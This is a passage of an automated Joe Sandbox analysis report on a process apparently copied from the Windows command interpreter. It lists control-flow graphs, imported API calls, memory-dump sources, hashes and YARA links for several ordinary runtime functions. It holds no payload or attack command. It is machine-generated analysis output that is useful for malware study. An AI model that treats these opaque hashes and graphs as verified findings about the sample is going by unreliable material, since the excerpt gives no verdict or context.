1021->1026 1022->1026 1037 7ff755cac9d0-7ff755cac9d7 1023->1037 1029 7ff755cac9a0-7ff755cac9a9 1024->1029 1030 7ff755cbc631 1025->1030 1031 7ff755cac719-7ff755cac72c 1025->1031 1026->1030 1029->1029 1034 7ff755cac9ab-7ff755cac9af 1029->1034 1036 7ff755cbc63b 1030->1036 1035 7ff755cac732-7ff755cac747 call 7ff755cad3f0 1031->1035 1031->1036 1034->1015 1038 7ff755cbc60e-7ff755cbc611 call 7ff755ccec14 1034->1038 1045 7ff755cac74d-7ff755cac750 1035->1045 1046 7ff755cac8ac-7ff755cac8af 1035->1046 1042 7ff755cbc645 1036->1042 1040 7ff755cac872-7ff755cac8aa call 7ff755cb855c call 7ff755cb8f80 1037->1040 1041 7ff755cac9dd-7ff755cbc6da SetConsoleTitleW 1037->1041 1038->1022 1041->1040 1053 7ff755cbc64e-7ff755cbc651 1042->1053 1049 7ff755cac752-7ff755cac764 call 7ff755cabd38 1045->1049 1050 7ff755cac76a-7ff755cac76d 1045->1050 1046->1045 1052 7ff755cac8b5-7ff755cac8d3 wcsncmp 1046->1052 1049->1004 1049->1050 1056 7ff755cac840-7ff755cac84b call 7ff755cacb40 1050->1056 1057 7ff755cac773-7ff755cac77a 1050->1057 1052->1050 1058 7ff755cac8d9 1052->1058 1059 7ff755cbc657-7ff755cbc65b 1053->1059 1060 7ff755cac80d-7ff755cac811 1053->1060 1077 7ff755cac856-7ff755cac86c 1056->1077 1078 7ff755cac84d-7ff755cac855 call 7ff755cacad4 1056->1078 1065 7ff755cac780-7ff755cac784 1057->1065 1058->1045 1059->1060 1061 7ff755cac9e2-7ff755cac9e7 1060->1061 1062 7ff755cac817-7ff755cac81b 1060->1062 1061->1062 1069 7ff755cac9ed-7ff755cac9f7 call 7ff755cb291c 1061->1069 1067 7ff755cac821 1062->1067 1068 7ff755caca1b-7ff755caca1f 1062->1068 1070 7ff755cac78a-7ff755cac7a4 wcschr 1065->1070 1071 7ff755cac83d 1065->1071 1073 7ff755cac824-7ff755cac82d 1067->1073 1068->1067 1079 7ff755caca25-7ff755cbc6b3 call 7ff755ca3278 1068->1079 1087 7ff755cbc684-7ff755cbc698 call 7ff755ca3278 1069->1087 1088 7ff755cac9fd-7ff755caca00 1069->1088 1075 7ff755cac7aa-7ff755cac7ad 1070->1075 1076 7ff755cac8de-7ff755cac8f7 1070->1076 1071->1056 1073->1073 1080 7ff755cac82f-7ff755cac837 1073->1080 1082 7ff755cac7b0-7ff755cac7b8 1075->1082 1083 7ff755cac900-7ff755cac908 1076->1083 1077->1037 1077->1040 1078->1077 1079->1004 1080->1065 1080->1071 1082->1082 1089 7ff755cac7ba-7ff755cac7c7 1082->1089 1083->1083 1090 7ff755cac90a-7ff755cac915 1083->1090 1087->1004 1088->1062 1094 7ff755caca06-7ff755caca10 call 7ff755ca89c0 1088->1094 1089->1053 1095 7ff755cac7cd-7ff755cac7db 1089->1095 1096 7ff755cac93a-7ff755cac944 1090->1096 1097 7ff755cac917 1090->1097 1094->1062 1113 7ff755caca16-7ff755cbc67f GetLastError call 7ff755ca3278 1094->1113 1102 7ff755cac7e0-7ff755cac7e7 1095->1102 1099 7ff755caca2a-7ff755caca2f call 7ff755cb9158 1096->1099 1100 7ff755cac94a 1096->1100 1103 7ff755cac920-7ff755cac928 1097->1103 1099->1014 1100->1008 1106 7ff755cac800-7ff755cac803 1102->1106 1107 7ff755cac7e9-7ff755cac7f1 1102->1107 1108 7ff755cac932-7ff755cac938 1103->1108 1109 7ff755cac92a-7ff755cac92f 1103->1109 1106->1042 1111 7ff755cac809 1106->1111 1107->1106 1114 7ff755cac7f3-7ff755cac7fe 1107->1114 1108->1096 1108->1103 1109->1108 1111->1060 1113->1004 1114->1102 1114->1106
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ConsoleTitlewcschr
                                      • String ID: /$:
                                      • API String ID: 2364928044-4222935259
                                      • Opcode ID: 989dfed76e83e1e5127155f56046364be98515c6956e9669bb0cf7002a0e13e4
                                      • Instruction ID: 2533290812a217f91998278a9da034bce6f7e06ef9d7a21e0825d9dddc855f55
                                      • Opcode Fuzzy Hash: 989dfed76e83e1e5127155f56046364be98515c6956e9669bb0cf7002a0e13e4
                                      • Instruction Fuzzy Hash: 94C19EEBE0864381EA64BB25D4142B9A6A0FF81F98FCC5531E91E472D5EF3CE845D320
                                      Function 00007FF755CB8D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1171 7ff755cb8d80-7ff755cb8da2 1172 7ff755cb8da4-7ff755cb8daf 1171->1172 1173 7ff755cb8db1-7ff755cb8db4 1172->1173 1174 7ff755cb8dcc 1172->1174 1175 7ff755cb8dbf-7ff755cb8dca Sleep 1173->1175 1176 7ff755cb8db6-7ff755cb8dbd 1173->1176 1177 7ff755cb8dd1-7ff755cb8dd9 1174->1177 1175->1172 1176->1177 1178 7ff755cb8de7-7ff755cb8def 1177->1178 1179 7ff755cb8ddb-7ff755cb8de5 _amsg_exit 1177->1179 1181 7ff755cb8df1-7ff755cb8e0a 1178->1181 1182 7ff755cb8e46 1178->1182 1180 7ff755cb8e4c-7ff755cb8e54 1179->1180 1183 7ff755cb8e56-7ff755cb8e69 _initterm 1180->1183 1184 7ff755cb8e73-7ff755cb8e75 1180->1184 1185 7ff755cb8e0e-7ff755cb8e11 1181->1185 1182->1180 1183->1184 1186 7ff755cb8e80-7ff755cb8e88 1184->1186 1187 7ff755cb8e77-7ff755cb8e79 1184->1187 1188 7ff755cb8e13-7ff755cb8e15 1185->1188 1189 7ff755cb8e38-7ff755cb8e3a 1185->1189 1190 7ff755cb8eb4-7ff755cb8ec8 call 7ff755cb37d8 1186->1190 1191 7ff755cb8e8a-7ff755cb8e98 call 7ff755cb94f0 1186->1191 1187->1186 1192 7ff755cb8e17-7ff755cb8e1b 1188->1192 1193 7ff755cb8e3c-7ff755cb8e41 1188->1193 1189->1180 1189->1193 1200 7ff755cb8ecd-7ff755cb8eda 1190->1200 1191->1190 1201 7ff755cb8e9a-7ff755cb8eaa 1191->1201 1196 7ff755cb8e2d-7ff755cb8e36 1192->1196 1197 7ff755cb8e1d-7ff755cb8e29 1192->1197 1194 7ff755cb8f28-7ff755cb8f3d 1193->1194 1196->1185 1197->1196 1203 7ff755cb8ee4-7ff755cb8eeb 1200->1203 1204 7ff755cb8edc-7ff755cb8ede exit 1200->1204 1201->1190 1205 7ff755cb8ef9 1203->1205 1206 7ff755cb8eed-7ff755cb8ef3 _cexit 1203->1206 1204->1203 1205->1194 1206->1205
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                      • String ID:
                                      • API String ID: 4291973834-0
                                      • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                      • Instruction ID: 2335df1199ad318f74c5eae0fc773c3075df21977897c4360f65a0b77039ad75
                                      • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                      • Instruction Fuzzy Hash: 3D41B9EFE0868386E691FB10E940279A2A0AF44F6CFC80436D94D876A1DF7DEC448660
                                      Function 00007FF755CA89C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1207 7ff755ca89c0-7ff755ca8a3d memset call 7ff755caca40 1210 7ff755ca8a43-7ff755ca8a71 GetDriveTypeW 1207->1210 1211 7ff755ca8ace-7ff755ca8adf 1207->1211 1212 7ff755cbb411-7ff755cbb422 1210->1212 1213 7ff755ca8a77-7ff755ca8a7a 1210->1213 1214 7ff755ca8ae1-7ff755ca8ae8 ??_V@YAXPEAX@Z 1211->1214 1215 7ff755ca8aed 1211->1215 1218 7ff755cbb430-7ff755cbb435 1212->1218 1219 7ff755cbb424-7ff755cbb42b ??_V@YAXPEAX@Z 1212->1219 1213->1211 1216 7ff755ca8a7c-7ff755ca8a7f 1213->1216 1214->1215 1217 7ff755ca8aef-7ff755ca8b16 call 7ff755cb8f80 1215->1217 1216->1211 1220 7ff755ca8a81-7ff755ca8ac8 GetVolumeInformationW 1216->1220 1218->1217 1219->1218 1220->1211 1222 7ff755cbb3fc-7ff755cbb40b GetLastError 1220->1222 1222->1211 1222->1212
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$DriveErrorInformationLastTypeVolume
                                      • String ID:
                                      • API String ID: 850181435-0
                                      • Opcode ID: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                      • Instruction ID: a13d0db209a67bc175d0de78ec16218d0bb120d775274daa8a4d0b866a99427d
                                      • Opcode Fuzzy Hash: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                      • Instruction Fuzzy Hash: BF414FB7608BC2CAE760DF20D8442E9BBA4FB89F49F994525DA4D8BB48CF38D545C710
                                      Function 00007FF755CB4A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1224 7ff755cb4a14-7ff755cb4a3e GetEnvironmentStringsW 1225 7ff755cb4a40-7ff755cb4a46 1224->1225 1226 7ff755cb4aae-7ff755cb4ac5 1224->1226 1227 7ff755cb4a59-7ff755cb4a8f GetProcessHeap HeapAlloc 1225->1227 1228 7ff755cb4a48-7ff755cb4a52 1225->1228 1230 7ff755cb4a91-7ff755cb4a9a memmove 1227->1230 1231 7ff755cb4a9f-7ff755cb4aa9 FreeEnvironmentStringsW 1227->1231 1228->1228 1229 7ff755cb4a54-7ff755cb4a57 1228->1229 1229->1227 1229->1228 1230->1231 1231->1226
                                      APIs
                                      • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A28
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A66
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A7D
                                      • memmove.MSVCRT(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A9A
                                      • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4AA2
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                      • String ID:
                                      • API String ID: 1623332820-0
                                      • Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                      • Instruction ID: ee96a19b9fa0f1cc9fffb79ea2662411ed397d94518712410385f165bd0d9323
                                      • Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                      • Instruction Fuzzy Hash: B81194ABA18B8382DE50AB41A404039FBA1EB89F94BCD9035DE4E03744DE3DE8418760
                                      Function 00007FF755CB5CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                      • String ID:
                                      • API String ID: 1826527819-0
                                      • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                      • Instruction ID: 571ab0044a63b28afc6e93d8ac93c660179a7cfbd2b90d0ef0b0643428252375
                                      • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                      • Instruction Fuzzy Hash: 7F015BBA9086838AE6407B24A4451B9FF60EB8EF69FC86130D54F46395CF3C94448B20
                                      Function 00007FF755CB3060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CB1EA0: wcschr.MSVCRT(?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF755CD0D54), ref: 00007FF755CB1EB3
                                      • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF755CA92AC), ref: 00007FF755CB30CA
                                      • SetErrorMode.KERNELBASE ref: 00007FF755CB30DD
                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB30F6
                                      • SetErrorMode.KERNELBASE ref: 00007FF755CB3106
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ErrorMode$FullNamePathwcschr
                                      • String ID:
                                      • API String ID: 1464828906-0
                                      • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                      • Instruction ID: aadf6ab21e20f87c1b43e20b080568f2d70318039600faa5db4c2cf0229446d1
                                      • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                      • Instruction Fuzzy Hash: C531D3ABE0865382E764AF15A44007EF661EB46FA8FDC9234DA5A433D0EE7DEC458310
                                      Function 00007FF755CACA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                      • API String ID: 2221118986-3416068913
                                      • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                      • Instruction ID: 9480f50401eb63d477c8859848da6b64336bdd9db7cef6448b0f6c72183955dc
                                      • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                      • Instruction Fuzzy Hash: 3411CAABA1864781EB90EB55E144279A6909F84FA8F9C4731ED6D4B7D5DD2CD8804320
                                      Function 00007FF755CABE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memsetwcschr
                                      • String ID: 2$COMSPEC
                                      • API String ID: 1764819092-1738800741
                                      • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                      • Instruction ID: 662b3d5409abe09da91de2967998a9e08c64981624db127003399d2cf7f84a53
                                      • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                      • Instruction Fuzzy Hash: 51519EBFA0864785FB70BB21D841379EB919F45F8CF8C4835DA0D466D6DE6CE8408760
                                      Function 00007FF755CB2EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                      • String ID:
                                      • API String ID: 4254246844-0
                                      • Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                      • Instruction ID: 079cbb35de01beabb00a3983ac20bd906b55bab50d1797c23c58b4b7e1a6c5e7
                                      • Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                      • Instruction Fuzzy Hash: 9E41B4ABA0874386EE20AB50E444379F7A0EF85FA8FDC4535DA4E47791DE3CE8458621
                                      Function 00007FF755CB498C Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$EnvironmentFreeProcessVariable
                                      • String ID:
                                      • API String ID: 2643372051-0
                                      • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                      • Instruction ID: 06eddbe180d11163b964c505e91ec28edcd14a2119231e091c34419f617a7a3f
                                      • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                      • Instruction Fuzzy Hash: B1F062A7A19B8385EA40AB65A544075EAA1FF5AFA4BCE9274C52E43390DE3C94848250
                                      Function 00007FF755CB5A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _get_osfhandle$ConsoleMode
                                      • String ID:
                                      • API String ID: 1591002910-0
                                      • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                      • Instruction ID: 67575a527bb5efb5466e517999647032b9c05da1353cf30e2682f441c974d32b
                                      • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                      • Instruction Fuzzy Hash: A9F07ABAA09783CBE645AB11E845078FBA1FB89F19F984138C90E47320DF3CA4159B50
                                      Function 00007FF755CB291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
